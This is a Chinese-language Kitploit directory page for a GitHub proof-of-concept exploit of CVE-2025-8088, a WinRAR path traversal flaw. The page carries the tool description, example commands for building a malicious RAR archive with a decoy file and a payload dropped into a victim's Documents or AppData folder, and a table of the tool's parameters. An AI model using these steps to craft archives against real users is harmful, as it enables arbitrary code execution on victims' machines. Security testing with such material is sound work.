Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-8088 — 针对CVE-2025-8088的概念验证利用,这是WinRAR路径遍历漏洞,通过构造的RAR存档实现任意代码执行。包括一个Python脚本,具有可配置的诱饵、载荷和放置路径,用于授权安全测试。 | Kitploit
工具/GitHubGitHub/ghostn4444/cve-2025-8088
Payload生成漏洞分析漏洞利用渗透测试学习与教育二进制利用
GitHubghostn4444/cve-2025-8088

CVE-2025-8088

针对CVE-2025-8088的概念验证利用,这是WinRAR路径遍历漏洞,通过构造的RAR存档实现任意代码执行。包括一个Python脚本,具有可配置的诱饵、载荷和放置路径,用于授权安全测试。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-8088

WinRAR:WinRAR 路径遍历漏洞,可导致任意代码执行 (CVE-2025-8088)

CVE-2025-8088 PoC - 隐蔽利用 - README 英文(美国)

CVE-2025-8088 PoC - 隐秘利用 - README 葡萄牙语(巴西)

CVE-2025-8088 PoC – 隐藏利用 - README 西班牙语(西班牙)

CVE-2025-8088 PoC – 入口覆盖 - README 俄语(俄罗斯)

root@kitploit:~
Exploit_cve_2025_8088.ps1

root@kitploit:~
python poc.py 

PoC

📋 必需参数

⚙️ 可选参数

🎯 使用示例

root@kitploit:~
# 基本用法(自动发现 rar.exe)
python poc.py --decoy resume.txt --payload payload.bat --drop "C:\Users\Victim\Documents"

# 完整自定义配置
python poc.py \
  --decoy document.pdf \
  --payload script.bat \
  --drop "C:\Users\Victim\AppData\Roaming" \
  --rar "C:\Program Files\WinRAR\rar.exe" \
  --out malicious.rar \
  --workdir ./build \
  --placeholder_len 150 \
  --max_up 20

官方 GitHub 链接 归因: sxyrxyy

下载工具
参数描述示例
--decoy诱饵文件路径(如果不存在则创建)resume.txt
--payload载荷文件路径(如果不存在则创建)payload.bat
--drop目标目录的绝对路径,载荷将被解压到此处C:\Users\Victim\Documents
参数描述默认值备注
--rarrar.exe 的路径自动发现将检查常见路径和 PATH
--out输出的 RAR 文件名poc-cve-2025-8088.rar最终的恶意存档文件
--workdir临时文件的工作目录当前目录 (.)
--placeholder_lenADS 占位符长度max(len(target_path), 128)越长越可靠的遍历
--max_up父目录遍历次数 (..\)16建议至少 8 次
--base_out中间基础 RAR 文件名<out>.base.rar临时文件,完成后删除